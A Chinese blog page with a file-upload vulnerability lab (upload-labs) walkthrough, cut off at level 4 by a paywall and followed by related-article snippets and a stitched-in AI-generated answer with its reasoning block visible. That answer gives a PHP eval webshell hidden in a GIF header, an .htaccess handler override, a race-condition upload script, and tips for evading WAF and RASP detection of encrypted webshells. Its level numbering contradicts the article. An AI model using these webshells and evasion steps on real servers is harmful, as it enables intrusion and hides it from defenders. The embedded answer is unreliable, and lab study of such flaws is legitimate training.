upload-labs 1-21关通关思路教程

最新推荐文章于 2025-09-12 17:01:15 发布
原创 最新推荐文章于 2025-09-12 17:01:15 发布 · 2k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #服务器 #网络安全

本文详细介绍了Upload-Labs的多个关卡,讲解如何通过禁用JavaScript、修改Content-Type、利用黑名单和白名单漏洞、.htaccess文件、空格和特殊字符绕过等方法来实现文件上传的绕过策略。同时,提到了文件包含漏洞、%00截断、二次渲染图片马等技术在绕过上传限制中的应用。文章强调了在网络安全和Web应用中理解这些概念的重要性。

Upload-Labs and 1-21关通关教程

前言:本文章一下的涉及的环境均来着GitHub中的官方upload-labs环境,中间件是使用phpstudy2018搭建,文章涉及的内容仅代表个人思路个人观点,绕过思路不是单一的,举一反三即可。请勿较真。

第一关:针对JavaScript的处理绕过

通过浏览器网络进行抓包,并没有发现任何数据,猜测为前端JavaScript验证的。
javascript
绕过方法:直接在浏览器禁用JavaScript代码
火狐浏览器禁用JavaScript
右键查看地址访问
上传成功

成功访问PHP info

第二关:Content-Type的验证

通过源代码可发现是验证上传文件的type值,那么直接修改成允许的值即可。
burp修改
上传成功

黑名单的绕过

前言:黑名单的意思就是,不允许上传的类型,比如禁止上传php,asp等等,这种就是黑名单。

第三关:其他后缀名的绕过

先看源代码

源代码:
 		$deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空
        $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext; 
        解析:这里定义了禁止上传的名单,并且对上传的后缀做了删除末尾的点,转换小写等等操作
        文件命名还做了时间戳的处理。

综合上面的源代码,发现并没有对php2,php3,phtml这些后缀进行过滤,在php中,这些后缀都是会当作php来解析的。前提是httpd.conf中AddType application/x-httpd-php.php.phtml.php3.php4.php5 没有被注释掉才可以用。ps:其实也可以通过.user.ini进行绕过。
上传成功

第四关:利用.htaccess绕过

先看源代码

源代码:
 		$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1"
最低0.47元/天 解锁文章
upload-labs通关(Pass01-Pass05)
m0_46467017的博客
08-15 2399
我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。本也有两种绕过方法:第一种是上传php文件,改Content-Type,第二种是上次合法后缀文件,改文件改后缀。...
upload-labs1-21 附详细解析(文件上传漏洞)
weixin_47306547的博客
09-08 9464
1 客户端 JavaScript检验(通常为检测文件拓展名) 判断方法:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传 .jpg / .jpeg / .png 后缀名的文件,而此时并未发送数据包。 绕过办法:1.利用BurpSuite之类的代理工具进行抓包。 2.修改webshell后缀类型为允许上传类型。 3.抓包来拦截将其后缀名改为对应服务器可以解析的后缀名。 第 2 服务器MI
upload-labs通关教程(建议萌新收藏)文件上传漏洞超详细解析,网络安全零基础入门到精通教程建议收藏!
qq_41314882的博客
09-12 843
本文介绍了文件上传漏洞的基本概念及高危触发场景,并针对upload-labs靶场的前8进行了漏洞复现。主要内容包括:文件上传漏洞的定义(用户可上传恶意脚本执行)、常见风险场景(头像上传、论坛附件等),以及具体绕过方法:前端JS验证绕过(修改/禁用JS)、MIME类型修改、特殊后缀名(php1/php2)、.htaccess文件利用、大小写绕过、空格和点号绕过等技巧,同时提供中国蚁剑等工具验证漏洞利用效果。
upload-labs通关详细教程
m0_52923241的博客
03-01 4329
在很多时候有限制文件上传的类型,而黑名单ban了很多相的后缀,如果没有禁用.htaccee那么就能触发getshell.htaccess可以把.jpg解析成php:函数会将所有字母转换为小写,在没有此功能,且很多后缀被ban的情况下,可以使用大小写绕过:该函数将字符串收尾去空,在大小写绕不过,且没有使用此函数时,可使用后缀空绕过此函数删除了文件名末尾的点:去除字符串::$DATA。
Upload-labs1-21详细教程)【简单易懂】【万字教程
墨鱼菜鸡
09-10 4980
目录 思维导图 练习网站: 注意: 知识点 Pass-01 代码: 提示: 解题思路: Pass-02 知识点: 代码: 提示: 解题思路: Pass-03(本需要使用自己搭建upload-labs) 代码: 提示: 解题思路: Pass-04 代码: 提示: 解题思路: Pass-05(建议使用本机搭建的...
upload-labs通关教程
qq_73792226的博客
09-10 1707
首先准备一个php小马这是调用phpinfo这个函数,查看php的配置信息首先上传1.php发现使用BP抓不到包,猜测被前端验证了,查看网页源代码可以看到下面有一段js代码过滤了,只能传.jpg/.png/.gif,进行了白名单过滤,所以我们需要禁用前端的js代码使用这个扩展可以禁用前端代码的执行,也可以直接按F12进入开发者模式,在按F1进入设置这里可以禁用js代码右键在新窗口打开,出现下面的页面就成功了。
Upload-labs 1-21 靶场通关笔记(含代码审计)
weixin_54894046的博客
10-15 1万+
Upload-labs 1-21 靶场通关笔记(含代码审计)
DAY14:Upload-labs 通关教程
qq_49433473的博客
07-26 795
upload-labs 2022最新通关教程
upload-labs通关指南
01-22
upload-labs通关指南》是一份针对upload_labs文件上传靶场的详细通关攻略文档。在网络安全领域,文件上传靶场是一个专门用于学习和研究文件上传漏洞攻防技术的平台。本指南不仅涵盖了客户端验证漏洞和多种服务端...
安装upload-labs
10-22
安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的...
upload-labs靶场
09-09
通过利用upload-labs安全研究人员和爱好者可以提高对各种上传漏洞的识别和利用能力,这对于提升网站的安全防护水平至重要。上传漏洞通常出现在Web应用需要用户上传文件的场景中,如果开发者没有严格限制上传文件...
upload-labs通关手册
12-03
详细记录了upload-labs靶场的通关步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
Upload-labs 1-21 靶场通关攻略
2301_80402555的博客
09-01 1225
1、上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行。1、上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg。1、图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。1、上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。2、先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片。
Upload-labs 1-21 靶场通关攻略(全网最全最完整)
热门推荐
晚安這個未知的世界
03-21 9万+
Pass-1(前端验证) 因为是进行前端JS校验,因此可以直接在浏览器检查代码把checkFile()函数(即如下图红色框选中的函数)删了或者也可以把红色框改成true,并按回车,即可成功上传php文件 复制图片地址并用蚁剑进行连接 Pass-2(MIME验证) 分析代码,可以看到,后端PHP代码只对content-type进行了检查 使用bp抓包,修改上传的PHP的content-type为image/png Pass-3(黑名单验证,特殊后缀) 这题本人使用的是PHP5.2.17环境 分析代码
upload-labs靶场(1-21)详解全套通关
waqqy的博客
12-12 2万+
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。
upload-labs详细教程
shayebudon的博客
11-09 1万+
第一 js检查 查看源码 由源代码可知,允许上传的文件为.jpg|.png|.gif 我们上传一个.jpg文件 利用burp suite进行抓包 将jpg改为php后,放包 上传成功。 第二Content-Type 查看源码 有源码可知,发现只判断Content-Type类型,所以我们只需修改Content-Type进行绕过即可 首先上传php文件,抓上传包 将箭头所指的内容改为image/jpeg或image/png或image/gif后...
Upload-labs 1~15 通关详细教程
qq_45953122的博客
09-09 3156
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21,每一都包含着不同上传方式。
upload-labs靶场1-21通关使用冰蝎
最新发布
10-23
<think>嗯,用户要求使用冰蝎完成upload-labs靶场1-21通关方法。这个问题涉及网络安全攻防技术,需要结合文件上传漏洞和Webshell工具使用。 用户提供了四条引用信息: 1. 第19需要修改靶场配置,图片路径问题 2. 第20考察条件竞争漏洞 3. 黑名单过滤可用.htaccess绕过 4. 存在文件包含漏洞的测试页面 结合这些信息,考虑冰蝎作为动态二进制加密的Webshell工具,其特点是流量加密、特征隐蔽。通关upload-labs键点在于: 1. 制作冰蝎的加密Webshell文件(.php/.jsp等) 2. 绕过各不同的上传验证机制 3. 利用文件包含或解析漏洞执行Webshell 准备这样组织回答: 首先说明冰蝎Webshell的通用生成方法,强调加密密钥配置的要点 然后按卡分组讲解: - 前端验证类(1-5):直接修改请求或禁用JS - MIME类型类(6-9):修改Content-Type - 黑名单扩展名类(10-16):利用特殊后缀或.htaccess - 竞争条件类(17,20):多线程并发请求 - 二次渲染类(17-19):结合GIF89a头或文件包含 - 自定义验证类(21):代码审计找逻辑漏洞 特别注意事项: 1. 第19需要修改靶场配置的路径问题 2. 强调冰蝎连接时需要保持密钥一致 3. 条件竞争卡要用多线程工具 4. .htaccess绕过时注意服务器配置 最后提醒读者仅在授权环境下测试,并提供防御建议体现专业性。 </think>以下是通过冰蝎(Behinder)完成Upload-Labs靶场1-21通关方法,结合漏洞原理和冰蝎特性实现高效绕过: ### 一、冰蝎工具准备 1. **生成加密Webshell** 在冰蝎中选择PHP类型,生成加密Webshell文件(如`shell.php`),密钥需与客户端配置一致 ```php <?php @error_reporting(0); session_start(); $key = "e45e329feb5d925b"; // 需与冰蝎客户端密钥匹配 // ...冰蝎加密代码... ?> ``` 2. **核心绕过策略** - 利用冰蝎的**流量加密**特性绕过WAF检测 - 通过**文件头伪装**(如GIF89a)和**二次渲染绕过**应对图片验证 - 结合**解析漏洞**(如`.htaccess`)执行恶意脚本 --- ### 二、通关方案 #### 1. 前端验证类(1-5) **方法**: - 禁用JS或Burp截断修改文件扩展名 - 直接上传冰蝎的`shell.php`文件 ```http POST /upload.php HTTP/1.1 ... Content-Disposition: form-data; name="file"; filename="shell.php" ``` #### 2. MIME类型验证(卡6-9) **方法**: 修改Content-Type为合法类型(如图片) ```http Content-Type: image/jpeg // 实际文件为PHP ``` #### 3. 黑名单绕过(10-16) **方案1**:特殊扩展名(10-12) - 上传`shell.php5`、`shell.phtml`(需服务器支持解析) **方案2**:`.htaccess`攻击(13-16)[^3] 1. 先上传`.htaccess`文件: ```apache <FilesMatch "jpg"> SetHandler application/x-httpd-php </FilesMatch> ``` 2. 上传冰蝎Webshell文件`shell.jpg` #### 4. 条件竞争(17,20) **利用步骤**[^2]: 1. 使用Python多线程同时进行: ```python import threading import requests def upload(): requests.post(url, files={"file": open("shell.php","rb")}) def access(): while True: r = requests.get("http://target/upload/shell.php") if r.status_code == 200: break threading.Thread(target=upload).start() threading.Thread(target=access).start() ``` #### 5. 二次渲染绕过(18-19) **方法**: 1. 制作GIF+PHP混合文件: ```bash echo 'GIF89a<?=eval($_POST["cmd"]);?>' > shell.gif ``` 2. 上传后通过文件包含漏洞执行[^4]: ``` http://target/include.php?file=upload/shell.gif ``` #### 6. 自定义过滤(21) **绕过技巧**: - 使用非常规大写扩展名:`shell.PhP` - 分块传输编码(Chunked)绕过长度检查 --- ### 三、防御规避要点 1. **冰蝎连接配置**: - 启用AES256加密模式 - 闭`Connection`头保持减少特征 2. **流量混淆**: - 在冰蝎插件中启用`Content-Type`伪装(如`image/jpeg`) - 使用动态密钥轮换机制 > **注意**:19需修正靶场配置路径(引用[^1]),否则上传路径错误可能导致漏洞利用失败。 --- ### 附:防御建议(管理员视角) 1. 文件上传目录禁止执行权限 2. 使用文件内容检测而非扩展名 3. 限制`.`和`/`符号防路径穿越 4. 部署RASP防护对抗加密Webshell
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值